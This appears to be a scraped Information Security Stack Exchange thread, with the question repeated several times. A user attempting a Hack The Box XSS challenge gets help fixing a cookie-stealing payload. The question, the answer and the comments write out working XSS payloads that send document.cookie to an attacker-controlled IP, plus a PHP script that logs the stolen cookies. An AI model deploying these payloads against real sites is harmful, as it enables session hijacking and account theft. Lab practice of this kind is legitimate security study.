XSS code not fetching back script
Clash Royale CLAN TAG#URR8PPP
I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.
The issue I have is that after the initial call from the top fetch the index.html
the malicious script which should be called from the html file is not getting called.
Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.
The application is using HTTPS but my python server is HTTP.
Is my implementation wrong or my understanding of this attack vector?
<script src="http://My_ip/index.html"></script>
I'm trying to then fetch this html
file containing a remote malicious script...
<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>
And this is my php script that is supposed to be receiving the file.
<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>
The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.
I did also try this as the XSS payload but I only got the callback and no cookie data.
<script src='http://my_ip/write.php?c='+document.cookie;</script>
xss javascript
add a comment |
I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.
The issue I have is that after the initial call from the top fetch the index.html
the malicious script which should be called from the html file is not getting called.
Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.
The application is using HTTPS but my python server is HTTP.
Is my implementation wrong or my understanding of this attack vector?
<script src="http://My_ip/index.html"></script>
I'm trying to then fetch this html
file containing a remote malicious script...
<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>
And this is my php script that is supposed to be receiving the file.
<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>
The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.
I did also try this as the XSS payload but I only got the callback and no cookie data.
<script src='http://my_ip/write.php?c='+document.cookie;</script>
xss javascript
Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is theindex.html
file that is fetched?
– tim
Dec 30 '18 at 22:05
@tim I've edited it and yes, it is using HTTPS. I am just using theindex.html
file because it was part of the tutorial I found on Null Byte. I've not done XSS before
– Rich C
Dec 30 '18 at 22:37
add a comment |
I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.
The issue I have is that after the initial call from the top fetch the index.html
the malicious script which should be called from the html file is not getting called.
Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.
The application is using HTTPS but my python server is HTTP.
Is my implementation wrong or my understanding of this attack vector?
<script src="http://My_ip/index.html"></script>
I'm trying to then fetch this html
file containing a remote malicious script...
<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>
And this is my php script that is supposed to be receiving the file.
<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>
The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.
I did also try this as the XSS payload but I only got the callback and no cookie data.
<script src='http://my_ip/write.php?c='+document.cookie;</script>
xss javascript
I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.
The issue I have is that after the initial call from the top fetch the index.html
the malicious script which should be called from the html file is not getting called.
Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.
The application is using HTTPS but my python server is HTTP.
Is my implementation wrong or my understanding of this attack vector?
<script src="http://My_ip/index.html"></script>
I'm trying to then fetch this html
file containing a remote malicious script...
<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>
And this is my php script that is supposed to be receiving the file.
<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>
The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.
I did also try this as the XSS payload but I only got the callback and no cookie data.
<script src='http://my_ip/write.php?c='+document.cookie;</script>
xss javascript
xss javascript
edited Dec 30 '18 at 22:42
Rich C
asked Dec 30 '18 at 21:13
Rich CRich C
1115
1115
Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is theindex.html
file that is fetched?
– tim
Dec 30 '18 at 22:05
@tim I've edited it and yes, it is using HTTPS. I am just using theindex.html
file because it was part of the tutorial I found on Null Byte. I've not done XSS before
– Rich C
Dec 30 '18 at 22:37
add a comment |
Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is theindex.html
file that is fetched?
– tim
Dec 30 '18 at 22:05
@tim I've edited it and yes, it is using HTTPS. I am just using theindex.html
file because it was part of the tutorial I found on Null Byte. I've not done XSS before
– Rich C
Dec 30 '18 at 22:37
Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the
index.html
file that is fetched?– tim
Dec 30 '18 at 22:05
Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the
index.html
file that is fetched?– tim
Dec 30 '18 at 22:05
@tim I've edited it and yes, it is using HTTPS. I am just using the
index.html
file because it was part of the tutorial I found on Null Byte. I've not done XSS before– Rich C
Dec 30 '18 at 22:37
@tim I've edited it and yes, it is using HTTPS. I am just using the
index.html
file because it was part of the tutorial I found on Null Byte. I've not done XSS before– Rich C
Dec 30 '18 at 22:37
add a comment |
1 Answer
1
active
oldest
votes
As far as I can tell, there are two issues here:
- modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).
- you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).
So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:
Fetch script:
<!-- note the .js instead of .html;
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>
Direct:
<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
1
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>
) to keep the payload nice and short. :)
– EdOverflow
Dec 30 '18 at 23:29
1
"[...] the JS file would then contain JS code [...]
", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:
") in that JavaScript file you are fetching. Soindex.js
would containdocument.location='http://my_ip/write.php?c='+document.cookie;
. This will then fetch the JavaScript file fromhttps://my_ip/
and run the code from the file in the victim's session.
– EdOverflow
Dec 31 '18 at 12:11
add a comment |
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "162"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
As far as I can tell, there are two issues here:
- modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).
- you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).
So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:
Fetch script:
<!-- note the .js instead of .html;
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>
Direct:
<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
1
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>
) to keep the payload nice and short. :)
– EdOverflow
Dec 30 '18 at 23:29
1
"[...] the JS file would then contain JS code [...]
", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:
") in that JavaScript file you are fetching. Soindex.js
would containdocument.location='http://my_ip/write.php?c='+document.cookie;
. This will then fetch the JavaScript file fromhttps://my_ip/
and run the code from the file in the victim's session.
– EdOverflow
Dec 31 '18 at 12:11
add a comment |
As far as I can tell, there are two issues here:
- modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).
- you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).
So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:
Fetch script:
<!-- note the .js instead of .html;
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>
Direct:
<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
1
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>
) to keep the payload nice and short. :)
– EdOverflow
Dec 30 '18 at 23:29
1
"[...] the JS file would then contain JS code [...]
", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:
") in that JavaScript file you are fetching. Soindex.js
would containdocument.location='http://my_ip/write.php?c='+document.cookie;
. This will then fetch the JavaScript file fromhttps://my_ip/
and run the code from the file in the victim's session.
– EdOverflow
Dec 31 '18 at 12:11
add a comment |
As far as I can tell, there are two issues here:
- modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).
- you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).
So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:
Fetch script:
<!-- note the .js instead of .html;
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>
Direct:
<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
As far as I can tell, there are two issues here:
- modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).
- you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).
So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:
Fetch script:
<!-- note the .js instead of .html;
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>
Direct:
<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
answered Dec 30 '18 at 22:58
timtim
23.1k66294
23.1k66294
1
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>
) to keep the payload nice and short. :)
– EdOverflow
Dec 30 '18 at 23:29
1
"[...] the JS file would then contain JS code [...]
", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:
") in that JavaScript file you are fetching. Soindex.js
would containdocument.location='http://my_ip/write.php?c='+document.cookie;
. This will then fetch the JavaScript file fromhttps://my_ip/
and run the code from the file in the victim's session.
– EdOverflow
Dec 31 '18 at 12:11
add a comment |
1
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>
) to keep the payload nice and short. :)
– EdOverflow
Dec 30 '18 at 23:29
1
"[...] the JS file would then contain JS code [...]
", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:
") in that JavaScript file you are fetching. Soindex.js
would containdocument.location='http://my_ip/write.php?c='+document.cookie;
. This will then fetch the JavaScript file fromhttps://my_ip/
and run the code from the file in the victim's session.
– EdOverflow
Dec 31 '18 at 12:11
1
1
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (
<script src=//example.com/script.js>
) to keep the payload nice and short. :)– EdOverflow
Dec 30 '18 at 23:29
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (
<script src=//example.com/script.js>
) to keep the payload nice and short. :)– EdOverflow
Dec 30 '18 at 23:29
1
1
"
[...] the JS file would then contain JS code [...]
", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:
") in that JavaScript file you are fetching. So index.js
would contain document.location='http://my_ip/write.php?c='+document.cookie;
. This will then fetch the JavaScript file from https://my_ip/
and run the code from the file in the victim's session.– EdOverflow
Dec 31 '18 at 12:11
"
[...] the JS file would then contain JS code [...]
", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:
") in that JavaScript file you are fetching. So index.js
would contain document.location='http://my_ip/write.php?c='+document.cookie;
. This will then fetch the JavaScript file from https://my_ip/
and run the code from the file in the victim's session.– EdOverflow
Dec 31 '18 at 12:11
add a comment |
Thanks for contributing an answer to Information Security Stack Exchange!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the
index.html
file that is fetched?– tim
Dec 30 '18 at 22:05
@tim I've edited it and yes, it is using HTTPS. I am just using the
index.html
file because it was part of the tutorial I found on Null Byte. I've not done XSS before– Rich C
Dec 30 '18 at 22:37